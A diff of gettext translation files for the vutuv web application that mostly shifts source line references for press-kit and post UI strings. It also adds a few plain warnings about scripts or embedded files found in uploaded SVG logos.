-#: lib/vutuv_web/live/press_kit_live.ex:847
+#: lib/vutuv_web/live/press_kit_live.ex:872
 #, elixir-autogen, elixir-format, fuzzy
 msgid "%{used} of %{max}"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1133
+#: lib/vutuv_web/live/press_kit_live.ex:1158
 #, elixir-autogen, elixir-format
 msgid "A photographer's @handle links to their profile and notifies nobody."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1218
+#: lib/vutuv_web/live/press_kit_live.ex:1243
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Add a logo variant"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1219
+#: lib/vutuv_web/live/press_kit_live.ex:1244
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Add a press photo"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1095
+#: lib/vutuv_web/live/press_kit_live.ex:1120
 #, elixir-autogen, elixir-format
 msgid "At the desk in the Bonn office"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1127
+#: lib/vutuv_web/live/press_kit_live.ex:1152
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Caption"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1105
-#: lib/vutuv_web/live/press_kit_live.ex:1170
+#: lib/vutuv_web/live/press_kit_live.ex:1130
+#: lib/vutuv_web/live/press_kit_live.ex:1195
 #, elixir-autogen, elixir-format
 msgid "Credit"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:864
+#: lib/vutuv_web/live/press_kit_live.ex:889
 #, elixir-autogen, elixir-format
 msgid "Dark"
 msgstr ""
@@ -23734,22 +23734,22 @@ msgstr ""
 msgid "Files a journalist may download and print"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1016
+#: lib/vutuv_web/live/press_kit_live.ex:1041
 #, elixir-autogen, elixir-format
 msgid "First: the main photo"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1015
+#: lib/vutuv_web/live/press_kit_live.ex:1040
 #, elixir-autogen, elixir-format
 msgid "First: the main variant"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1193
+#: lib/vutuv_web/live/press_kit_live.ex:1218
 #, elixir-autogen, elixir-format
 msgid "I hold the rights to this file and release it for editorial use, as long as the credit above is shown."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:864
+#: lib/vutuv_web/live/press_kit_live.ex:889
 #, elixir-autogen, elixir-format
 msgid "Light"
 msgstr ""
@@ -23761,13 +23761,13 @@ msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:123
 #: lib/vutuv_web/agent_docs/text.ex:414
-#: lib/vutuv_web/live/press_kit_live.ex:838
+#: lib/vutuv_web/live/press_kit_live.ex:863
 #: lib/vutuv_web/templates/press_kit/index.html.heex:55
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Logo variants"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:878
+#: lib/vutuv_web/live/press_kit_live.ex:903
 #, elixir-autogen, elixir-format
 msgid "No logo here yet."
 msgstr ""
@@ -23782,13 +23782,13 @@ msgstr ""
 msgid "No more than %{max} press photos."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:879
+#: lib/vutuv_web/live/press_kit_live.ex:904
 #, elixir-autogen, elixir-format
 msgid "No press photo here yet."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1114
-#: lib/vutuv_web/live/press_kit_live.ex:1180
+#: lib/vutuv_web/live/press_kit_live.ex:1139
+#: lib/vutuv_web/live/press_kit_live.ex:1205
 #, elixir-autogen, elixir-format
 msgid "Photo: Ada King"
 msgstr ""
@@ -23798,7 +23798,7 @@ msgstr ""
 msgid "Picture removed."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:537
+#: lib/vutuv_web/live/press_kit_live.ex:562
 #, elixir-autogen, elixir-format
 msgid "Please confirm the rights first, then choose the file."
 msgstr ""
@@ -23810,63 +23810,63 @@ msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:122
 #: lib/vutuv_web/agent_docs/text.ex:413
-#: lib/vutuv_web/live/press_kit_live.ex:838
+#: lib/vutuv_web/live/press_kit_live.ex:863
 #: lib/vutuv_web/templates/press_kit/index.html.heex:46
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Press photos"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:862
+#: lib/vutuv_web/live/press_kit_live.ex:887
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Show tiles on:"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1117
+#: lib/vutuv_web/live/press_kit_live.ex:1142
 #, elixir-autogen, elixir-format
 msgid "Shown beside the picture and asked for with every download."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:550
+#: lib/vutuv_web/live/press_kit_live.ex:575
 #, elixir-autogen, elixir-format, fuzzy
 msgid "That could not be saved."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1338
+#: lib/vutuv_web/live/press_kit_live.ex:1363
 #, elixir-autogen, elixir-format
 msgid "The first photo is the one shown first. Drag a tile, or use the arrows, to change the order."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:947
+#: lib/vutuv_web/live/press_kit_live.ex:972
 #, elixir-autogen, elixir-format
 msgid "This shelf is full. Remove one picture to add another."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:797
+#: lib/vutuv_web/live/press_kit_live.ex:822
 #, elixir-autogen, elixir-format
 msgid "What a journalist writing about you may download: photos in print quality and your logo as a file. Everything here is public and free for editorial use as long as your credit is shown."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1083
+#: lib/vutuv_web/live/press_kit_live.ex:1108
 #, elixir-autogen, elixir-format, fuzzy
 msgid "What the picture shows"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1082
+#: lib/vutuv_web/live/press_kit_live.ex:1107
 #, elixir-autogen, elixir-format
 msgid "Which variant this is"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1094
+#: lib/vutuv_web/live/press_kit_live.ex:1119
 #, elixir-autogen, elixir-format
 msgid "White on a dark background"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1128
+#: lib/vutuv_web/live/press_kit_live.ex:1153
 #, elixir-autogen, elixir-format
 msgid "Who took it, where, and what may be cropped."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1330
+#: lib/vutuv_web/live/press_kit_live.ex:1355
 #, elixir-autogen, elixir-format
 msgid "Your logo as a file, one tile per variant. A vector (SVG) is what a printer asks for; a PNG is what everybody else can open."
 msgstr ""
@@ -23883,14 +23883,14 @@ msgid_plural "%{count} bytes"
 msgstr[0] "%{count} byte"
 msgstr[1] "%{count} bytes"
 
-#: lib/vutuv_web/agent_docs/markdown.ex:1560
-#: lib/vutuv_web/agent_docs/text.ex:993
+#: lib/vutuv_web/agent_docs/markdown.ex:1564
+#: lib/vutuv_web/agent_docs/text.ex:995
 #, elixir-autogen, elixir-format
 msgid "Credit: %{credit}"
 msgstr "Credit: %{credit}"
 
-#: lib/vutuv_web/components/press_kit_components.ex:380
-#: lib/vutuv_web/components/press_kit_components.ex:383
+#: lib/vutuv_web/components/press_kit_components.ex:386
+#: lib/vutuv_web/components/press_kit_components.ex:389
 #, elixir-autogen, elixir-format
 msgid "Download %{format}"
 msgstr "Download %{format}"
@@ -23900,12 +23900,12 @@ msgstr "Download %{format}"
 msgid "Download photo"
 msgstr "Download photo"
 
-#: lib/vutuv/press_kit.ex:788
+#: lib/vutuv/press_kit.ex:811
 #, elixir-autogen, elixir-format
 msgid "Free for editorial use with credit."
 msgstr "Free for editorial use with credit."
 
-#: lib/vutuv_web/agent_docs/markdown.ex:1563
+#: lib/vutuv_web/agent_docs/markdown.ex:1567
 #, elixir-autogen, elixir-format
 msgid "PNG version"
 msgstr "PNG version"
@@ -23925,27 +23925,27 @@ msgstr "These pictures are offered for editorial use. Use them freely in reporti
 msgid "Video is being checked"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1251
+#: lib/vutuv_web/live/press_kit_live.ex:1276
 #, elixir-autogen, elixir-format
 msgid "Copies the vector file this page's logo was uploaded as onto this shelf."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1324
+#: lib/vutuv_web/live/press_kit_live.ex:1349
 #, elixir-autogen, elixir-format, fuzzy
 msgid "The page's logo as a file, one tile per variant. A vector (SVG) is what a printer asks for; a PNG is what everybody else can open."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1248
+#: lib/vutuv_web/live/press_kit_live.ex:1273
 #, elixir-autogen, elixir-format
 msgid "Use the page's own logo"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:779
+#: lib/vutuv_web/live/press_kit_live.ex:804
 #, elixir-autogen, elixir-format, fuzzy
 msgid "What a journalist writing about this page may download: photos in print quality and its logo as a file. Everything here is public and free for editorial use as long as the credit is shown."
 msgstr ""
 
-#: lib/vutuv_web/components/press_kit_components.ex:570
+#: lib/vutuv_web/components/press_kit_components.ex:607
 #: lib/vutuv_web/components/ui.ex:3281
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Report this picture"
@@ -24073,12 +24073,12 @@ msgstr ""
 msgid "Media Kit of %{name}"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1344
+#: lib/vutuv_web/live/press_kit_live.ex:1369
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Remove this picture from this page's Media Kit?"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1346
+#: lib/vutuv_web/live/press_kit_live.ex:1371
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Remove this picture from your Media Kit?"
 msgstr ""
@@ -24098,8 +24098,8 @@ msgstr ""
 msgid "press kit media journalist photographer download original print logo svg credit copyright presse pressefotos pressemappe medienkit mediakit fotos logo herunterladen bildnachweis"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4664
-#: lib/vutuv_web/components/post_components.ex:4714
+#: lib/vutuv_web/components/post_components.ex:4667
+#: lib/vutuv_web/components/post_components.ex:4717
 #, elixir-autogen, elixir-format
 msgid "Copy link to post"
 msgstr ""
@@ -24188,14 +24188,14 @@ msgstr ""
 msgid "Your uploads are not limited."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:672
+#: lib/vutuv_web/live/press_kit_live.ex:697
 #, elixir-autogen, elixir-format, fuzzy
 msgid "%{formatted} word"
 msgid_plural "%{formatted} words"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:756
+#: lib/vutuv_web/live/press_kit_live.ex:781
 #, elixir-autogen, elixir-format
 msgid "A paragraph an article can end on."
 msgstr ""
@@ -24207,22 +24207,22 @@ msgstr ""
 msgid "About %{name}"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:749
+#: lib/vutuv_web/live/press_kit_live.ex:774
 #, elixir-autogen, elixir-format
 msgid "About %{words} words. A paragraph at the end of an article."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:743
+#: lib/vutuv_web/live/press_kit_live.ex:768
 #, elixir-autogen, elixir-format
 msgid "About %{words} words. The two sentences under a photo."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:723
+#: lib/vutuv_web/live/press_kit_live.ex:748
 #, elixir-autogen, elixir-format
 msgid "An @handle links to that profile and notifies nobody."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:753
+#: lib/vutuv_web/live/press_kit_live.ex:778
 #, elixir-autogen, elixir-format
 msgid "As long as you like. The whole portrait."
 msgstr ""
@@ -24237,7 +24237,7 @@ msgstr ""
 msgid "Medium version"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:681
+#: lib/vutuv_web/live/press_kit_live.ex:706
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Nothing written yet."
 msgstr ""
@@ -24252,22 +24252,22 @@ msgstr ""
 msgid "Take whichever length fits the space you have. Each one stands on its own."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:757
+#: lib/vutuv_web/live/press_kit_live.ex:782
 #, elixir-autogen, elixir-format
 msgid "The whole story, for as long as it needs."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:630
+#: lib/vutuv_web/live/press_kit_live.ex:655
 #, elixir-autogen, elixir-format
 msgid "Three bios in three lengths, so a journalist can take the one that fits. You write them; nothing is made out of your CV."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:755
+#: lib/vutuv_web/live/press_kit_live.ex:780
 #, elixir-autogen, elixir-format
 msgid "Two sentences a caption can carry."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:691
+#: lib/vutuv_web/live/press_kit_live.ex:716
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Write"
 msgstr ""
@@ -24377,7 +24377,7 @@ msgstr ""
 msgid "Your post appears as soon as the video is ready"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3649
+#: lib/vutuv_web/components/post_components.ex:3653
 #, elixir-autogen, elixir-format
 msgid "Found through %{server}"
 msgstr ""
@@ -24576,22 +24576,22 @@ msgstr[1] ""
 msgid "Very busy on other servers right now:"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:904
+#: lib/vutuv_web/live/press_kit_live.ex:929
 #, elixir-autogen, elixir-format
 msgid "A picture still being checked is not public yet."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:907
+#: lib/vutuv_web/live/press_kit_live.ex:932
 #, elixir-autogen, elixir-format
 msgid "A visitor sees a pixelated stand-in in its place and can download nothing. The mark goes by itself when the check is through."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1269
+#: lib/vutuv_web/live/press_kit_live.ex:1294
 #, elixir-autogen, elixir-format
 msgid "Logo variants, further down this page, take this format."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1268
+#: lib/vutuv_web/live/press_kit_live.ex:1293
 #, elixir-autogen, elixir-format
 msgid "Press photos, further up this page, take this format."
 msgstr ""
@@ -24666,7 +24666,7 @@ msgstr ""
 msgid "You can only send files to members you are connected with."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3739
+#: lib/vutuv_web/components/post_components.ex:3742
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Report this post as not appropriate? Every copy of it disappears right away, for everyone on this vutuv."
 msgstr ""
@@ -24676,7 +24676,7 @@ msgstr ""
 msgid "Thank you. Every copy on this vutuv is gone."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3744
+#: lib/vutuv_web/components/post_components.ex:3747
 #, elixir-autogen, elixir-format, fuzzy
 msgid "Report this post as not appropriate? This copy disappears right away, for everyone on this vutuv. Copies other servers sent us stay."
 msgstr ""
@@ -24756,7 +24756,22 @@ msgstr ""
 msgid "the page %{page} itself was reported on vutuv."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3707
+#: lib/vutuv_web/components/post_components.ex:3688
 #, elixir-autogen, elixir-format
 msgid "Found through these servers"
+msgstr ""
+
+#: lib/vutuv_web/live/press_kit_live.ex:542
+#, elixir-autogen, elixir-format
+msgid "This logo carries a script, in an attribute whose name starts with %{marker}. Whoever downloads it runs that script when they open the file, so export the logo without any interactivity."
+msgstr ""
+
+#: lib/vutuv_web/live/press_kit_live.ex:555
+#, elixir-autogen, elixir-format
+msgid "This logo contains %{marker}, which vutuv reads as an embedded file and cannot decode. Remove it, or reword the title or description it sits in."
+msgstr ""
+
+#: lib/vutuv_web/live/press_kit_live.ex:549
+#, elixir-autogen, elixir-format
+msgid "This logo has a file embedded in it, usually a web font, that vutuv cannot check. Export it again with the text converted to outlines."
 msgstr ""

--- a/priv/gettext/it/LC_MESSAGES/default.po
+++ b/priv/gettext/it/LC_MESSAGES/default.po
@@ -121,8 +121,8 @@ msgstr "Compleanno"
 #: lib/vutuv_web/live/organization_live/edit.ex:378
 #: lib/vutuv_web/live/organization_live/new.ex:222
 #: lib/vutuv_web/live/post_live/composer.ex:2049
-#: lib/vutuv_web/live/press_kit_live.ex:729
-#: lib/vutuv_web/live/press_kit_live.ex:1139
+#: lib/vutuv_web/live/press_kit_live.ex:754
+#: lib/vutuv_web/live/press_kit_live.ex:1164
 #: lib/vutuv_web/templates/ad/new.html.heex:136
 #: lib/vutuv_web/templates/admin/legal_page/edit.html.heex:40
 #: lib/vutuv_web/templates/admin/newsletter/form_content.html.heex:57
@@ -165,7 +165,7 @@ msgstr "Contatto"
 msgid "Couldn't follow back to %{name}."
 msgstr "Non è stato possibile ricambiare il follow a %{name}."
 
-#: lib/vutuv_web/components/post_components.ex:4701
+#: lib/vutuv_web/components/post_components.ex:4704
 #: lib/vutuv_web/components/ui.ex:5042
 #: lib/vutuv_web/live/admin/job_live.ex:486
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:621
@@ -213,15 +213,15 @@ msgstr "Disattiva"
 msgid "Download"
 msgstr "Scarica"
 
-#: lib/vutuv_web/components/post_components.ex:4666
+#: lib/vutuv_web/components/post_components.ex:4669
 #: lib/vutuv_web/components/ui.ex:5033
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:613
 #: lib/vutuv_web/live/admin/newsletter_group_live.ex:649
 #: lib/vutuv_web/live/job_posting_live/dashboard.ex:150
 #: lib/vutuv_web/live/job_posting_live/show.ex:201
 #: lib/vutuv_web/live/organization_live/show.ex:159
-#: lib/vutuv_web/live/press_kit_live.ex:691
-#: lib/vutuv_web/live/press_kit_live.ex:1056
+#: lib/vutuv_web/live/press_kit_live.ex:716
+#: lib/vutuv_web/live/press_kit_live.ex:1081
 #: lib/vutuv_web/templates/admin/legal_page/index.html.heex:50
 #: lib/vutuv_web/templates/admin/newsletter/edit.html.heex:7
 #: lib/vutuv_web/templates/admin/newsletter/show.html.heex:19
@@ -624,8 +624,8 @@ msgstr "Pubblico"
 #: lib/vutuv_web/components/ui.ex:4934
 #: lib/vutuv_web/live/organization_live/edit.ex:376
 #: lib/vutuv_web/live/post_live/composer.ex:2376
-#: lib/vutuv_web/live/press_kit_live.ex:727
-#: lib/vutuv_web/live/press_kit_live.ex:1138
+#: lib/vutuv_web/live/press_kit_live.ex:752
+#: lib/vutuv_web/live/press_kit_live.ex:1163
 #: lib/vutuv_web/templates/admin/pref/index.html.heex:71
 #: lib/vutuv_web/templates/admin/user_pref/show.html.heex:84
 #: lib/vutuv_web/templates/settings/apps.html.heex:63
@@ -659,7 +659,7 @@ msgstr "Salva"
 #: lib/vutuv_web/live/search_live.ex:680
 #: lib/vutuv_web/live/shell_live.ex:1495
 #: lib/vutuv_web/live/shell_live.ex:1702
-#: lib/vutuv_web/live/tag_live/timeline.ex:353
+#: lib/vutuv_web/live/tag_live/timeline.ex:354
 #: lib/vutuv_web/templates/admin/account/index.html.heex:23
 #: lib/vutuv_web/templates/admin/account/index.html.heex:35
 #: lib/vutuv_web/templates/admin/tag/index.html.heex:30
@@ -1210,7 +1210,7 @@ msgstr "Tutti i sinonimi dei tag"
 msgid "All tag urls"
 msgstr "Tutti gli URL dei tag"
 
-#: lib/vutuv_web/components/post_components.ex:5319
+#: lib/vutuv_web/components/post_components.ex:5322
 #: lib/vutuv_web/templates/admin/tag/index.html.heex:2
 #: lib/vutuv_web/templates/tag/index.html.heex:1
 #: lib/vutuv_web/templates/user/show.html.heex:643
@@ -2121,7 +2121,7 @@ msgstr "Torna al post"
 #: lib/vutuv_web/live/post_live/composer.ex:2147
 #: lib/vutuv_web/live/post_live/composer.ex:2170
 #: lib/vutuv_web/live/post_live/composer.ex:2196
-#: lib/vutuv_web/live/press_kit_live.ex:1307
+#: lib/vutuv_web/live/press_kit_live.ex:1332
 #, elixir-autogen, elixir-format
 msgid "Cancel upload"
 msgstr "Annulla il caricamento"
@@ -2131,7 +2131,7 @@ msgstr "Annulla il caricamento"
 msgid "Delete post"
 msgstr "Elimina il post"
 
-#: lib/vutuv_web/components/post_components.ex:4698
+#: lib/vutuv_web/components/post_components.ex:4701
 #: lib/vutuv_web/live/post_live/edit.ex:151
 #, elixir-autogen, elixir-format
 msgid "Delete this post permanently?"
@@ -2147,7 +2147,7 @@ msgstr "Modifica il post"
 #: lib/vutuv_web/gettext_extraction_anchors.ex:87
 #: lib/vutuv_web/live/organization_live/feed.ex:203
 #: lib/vutuv_web/live/post_live/feed.ex:366
-#: lib/vutuv_web/live/post_live/feed.ex:3594
+#: lib/vutuv_web/live/post_live/feed.ex:3592
 #: lib/vutuv_web/live/post_live/feed_calendar.ex:46
 #: lib/vutuv_web/live/shell_live.ex:1346
 #: lib/vutuv_web/live/shell_live.ex:1692
@@ -2176,8 +2176,8 @@ msgstr "Nascondi a una persona specifica…"
 msgid "Hide this post from…"
 msgstr "Nascondi questo post a…"
 
-#: lib/vutuv_web/components/post_components.ex:4644
-#: lib/vutuv_web/components/post_components.ex:4646
+#: lib/vutuv_web/components/post_components.ex:4647
+#: lib/vutuv_web/components/post_components.ex:4649
 #, elixir-autogen, elixir-format
 msgid "Limited audience"
 msgstr "Pubblico limitato"
@@ -2193,7 +2193,7 @@ msgstr "Visitatori non connessi"
 msgid "No more than %{max} images per post."
 msgstr "Non più di %{max} immagini per post."
 
-#: lib/vutuv_web/live/post_live/feed.ex:3935
+#: lib/vutuv_web/live/post_live/feed.ex:3933
 #, elixir-autogen, elixir-format
 msgid "Nothing here yet. Follow people to fill your feed, or write your first post."
 msgstr ""
@@ -2226,7 +2226,7 @@ msgstr "Pubblica"
 msgid "Post deleted successfully."
 msgstr "Post eliminato."
 
-#: lib/vutuv_web/agent_docs/post_doc.ex:243
+#: lib/vutuv_web/agent_docs/post_doc.ex:244
 #: lib/vutuv_web/controllers/post_controller.ex:69
 #: lib/vutuv_web/controllers/post_controller.ex:90
 #: lib/vutuv_web/controllers/user_controller.ex:77
@@ -2244,13 +2244,13 @@ msgstr "Post eliminato."
 msgid "Posts"
 msgstr "Post"
 
-#: lib/vutuv_web/components/post_components.ex:5192
-#: lib/vutuv_web/components/post_components.ex:5196
+#: lib/vutuv_web/components/post_components.ex:5195
+#: lib/vutuv_web/components/post_components.ex:5199
 #, elixir-autogen, elixir-format
 msgid "Read more"
 msgstr "Leggi tutto"
 
-#: lib/vutuv_web/components/post_components.ex:5193
+#: lib/vutuv_web/components/post_components.ex:5196
 #: lib/vutuv_web/live/fediverse_account_live.ex:394
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:146
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:236
@@ -2272,7 +2272,7 @@ msgstr "Mostra meno"
 #: lib/vutuv_web/live/post_live/saved.ex:666
 #: lib/vutuv_web/live/post_live/saved.ex:694
 #: lib/vutuv_web/live/post_rewrites_live.ex:376
-#: lib/vutuv_web/live/press_kit_live.ex:1065
+#: lib/vutuv_web/live/press_kit_live.ex:1090
 #: lib/vutuv_web/templates/connection/index.html.heex:45
 #: lib/vutuv_web/views/settings_html.ex:386
 #, elixir-autogen, elixir-format
@@ -2306,7 +2306,7 @@ msgstr "Spiacenti, la pagina non è stata trovata."
 #: lib/vutuv_web/attachment_text.ex:73
 #: lib/vutuv_web/live/post_live/composer.ex:1615
 #: lib/vutuv_web/live/post_live/composer.ex:1720
-#: lib/vutuv_web/live/press_kit_live.ex:541
+#: lib/vutuv_web/live/press_kit_live.ex:566
 #, elixir-autogen, elixir-format
 msgid "That file could not be processed."
 msgstr "Non è stato possibile elaborare il file."
@@ -2350,27 +2350,27 @@ msgstr "Che c'è di nuovo?"
 msgid "What's new? Markdown is supported."
 msgstr "Che c'è di nuovo? Markdown è supportato."
 
-#: lib/vutuv_web/components/post_components.ex:4641
+#: lib/vutuv_web/components/post_components.ex:4644
 #, elixir-autogen, elixir-format
 msgid "edited"
 msgstr "modificato"
 
-#: lib/vutuv_web/components/post_components.ex:6959
+#: lib/vutuv_web/components/post_components.ex:6962
 #, elixir-autogen, elixir-format
 msgid "everyone else"
 msgstr "tutti gli altri"
 
-#: lib/vutuv_web/components/post_components.ex:6963
+#: lib/vutuv_web/components/post_components.ex:6966
 #, elixir-autogen, elixir-format
 msgid "logged-out visitors"
 msgstr "visitatori non connessi"
 
-#: lib/vutuv_web/components/post_components.ex:6961
+#: lib/vutuv_web/components/post_components.ex:6964
 #, elixir-autogen, elixir-format
 msgid "people who don't follow you"
 msgstr "persone che non La seguono"
 
-#: lib/vutuv_web/components/post_components.ex:6962
+#: lib/vutuv_web/components/post_components.ex:6965
 #, elixir-autogen, elixir-format
 msgid "people you don't follow"
 msgstr "persone che non segue"
@@ -2417,7 +2417,7 @@ msgid "All posts"
 msgstr "Tutti i post"
 
 #: lib/vutuv_web/components/post_components.ex:2186
-#: lib/vutuv_web/components/post_components.ex:7062
+#: lib/vutuv_web/components/post_components.ex:7065
 #: lib/vutuv_web/components/ui.ex:4476
 #: lib/vutuv_web/views/user_html.ex:476
 #, elixir-autogen, elixir-format
@@ -2436,7 +2436,7 @@ msgid "Bookmarks"
 msgstr "Salvati"
 
 #: lib/vutuv_web/components/post_components.ex:2130
-#: lib/vutuv_web/components/post_components.ex:7303
+#: lib/vutuv_web/components/post_components.ex:7279
 #: lib/vutuv_web/components/ui.ex:4462
 #: lib/vutuv_web/notification_line.ex:342
 #: lib/vutuv_web/views/user_html.ex:486
@@ -2445,7 +2445,7 @@ msgid "Like"
 msgstr "Mi piace"
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1301
-#: lib/vutuv_web/components/post_components.ex:7313
+#: lib/vutuv_web/components/post_components.ex:7289
 #: lib/vutuv_web/live/post_live/saved.ex:193
 #: lib/vutuv_web/live/post_live/saved.ex:526
 #: lib/vutuv_web/live/shell_live.ex:1596
@@ -2466,13 +2466,13 @@ msgstr "Qui non c'è ancora nulla. I post che salva compaiono qui."
 msgid "Nothing here yet. Posts you like show up here."
 msgstr "Qui non c'è ancora nulla. I post a cui mette Mi piace compaiono qui."
 
-#: lib/vutuv_web/components/post_components.ex:7050
+#: lib/vutuv_web/components/post_components.ex:7053
 #, elixir-autogen, elixir-format
 msgid "Only public posts can be reposted."
 msgstr "Solo i post pubblici possono essere ripubblicati."
 
 #: lib/vutuv_web/components/post_components.ex:2185
-#: lib/vutuv_web/components/post_components.ex:7061
+#: lib/vutuv_web/components/post_components.ex:7064
 #: lib/vutuv_web/live/post_live/saved.ex:822
 #: lib/vutuv_web/views/user_html.ex:476
 #, elixir-autogen, elixir-format
@@ -2480,26 +2480,26 @@ msgid "Remove bookmark"
 msgstr "Rimuovi dai salvati"
 
 #: lib/vutuv_web/components/post_components.ex:2166
-#: lib/vutuv_web/components/post_components.ex:7046
+#: lib/vutuv_web/components/post_components.ex:7049
 #: lib/vutuv_web/live/job_posting_live/dashboard.ex:168
 #, elixir-autogen, elixir-format
 msgid "Repost"
 msgstr "Ripubblica"
 
 #: lib/vutuv_web/components/post_components.ex:2759
-#: lib/vutuv_web/components/post_components.ex:6065
+#: lib/vutuv_web/components/post_components.ex:6068
 #, elixir-autogen, elixir-format
 msgid "Reposted by %{name}"
 msgstr "Ripubblicato da %{name}"
 
 #: lib/vutuv_web/components/post_components.ex:2165
-#: lib/vutuv_web/components/post_components.ex:7045
+#: lib/vutuv_web/components/post_components.ex:7048
 #, elixir-autogen, elixir-format
 msgid "Undo repost"
 msgstr "Annulla la ripubblicazione"
 
 #: lib/vutuv_web/components/post_components.ex:2129
-#: lib/vutuv_web/components/post_components.ex:7302
+#: lib/vutuv_web/components/post_components.ex:7278
 #: lib/vutuv_web/live/post_live/saved.ex:821
 #: lib/vutuv_web/views/user_html.ex:486
 #, elixir-autogen, elixir-format
@@ -2527,7 +2527,7 @@ msgstr "Non seguire più"
 msgid "Welcome to vutuv!"
 msgstr "Benvenuto su vutuv."
 
-#: lib/vutuv_web/components/post_components.ex:7357
+#: lib/vutuv_web/components/post_components.ex:7333
 #, elixir-autogen, elixir-format
 msgid "Only public posts can be answered."
 msgstr "Solo ai post pubblici si può rispondere."
@@ -2539,8 +2539,8 @@ msgid "Replies"
 msgstr "Risposte"
 
 #: lib/vutuv_web/components/post_components.ex:2375
-#: lib/vutuv_web/components/post_components.ex:7340
-#: lib/vutuv_web/components/post_components.ex:7341
+#: lib/vutuv_web/components/post_components.ex:7316
+#: lib/vutuv_web/components/post_components.ex:7317
 #: lib/vutuv_web/live/notification_live/index.ex:993
 #: lib/vutuv_web/live/post_live/reply.ex:49
 #: lib/vutuv_web/notification_line.ex:339
@@ -2548,7 +2548,7 @@ msgstr "Risposte"
 msgid "Reply"
 msgstr "Rispondi"
 
-#: lib/vutuv_web/components/post_components.ex:4600
+#: lib/vutuv_web/components/post_components.ex:4603
 #, elixir-autogen, elixir-format
 msgid "Reply to a deleted post"
 msgstr "Risposta a un post eliminato"
@@ -2574,7 +2574,7 @@ msgstr ""
 msgid "replied to your post."
 msgstr "ha risposto al Suo post."
 
-#: lib/vutuv_web/components/post_components.ex:4118
+#: lib/vutuv_web/components/post_components.ex:4121
 #: lib/vutuv_web/live/post_live/remote_post_reply.ex:63
 #: lib/vutuv_web/live/post_live/remote_reply.ex:61
 #: lib/vutuv_web/live/post_live/reply.ex:63
@@ -2582,14 +2582,14 @@ msgstr "ha risposto al Suo post."
 msgid "Reply to %{handle}"
 msgstr "Rispondi a %{handle}"
 
-#: lib/vutuv_web/components/post_components.ex:4572
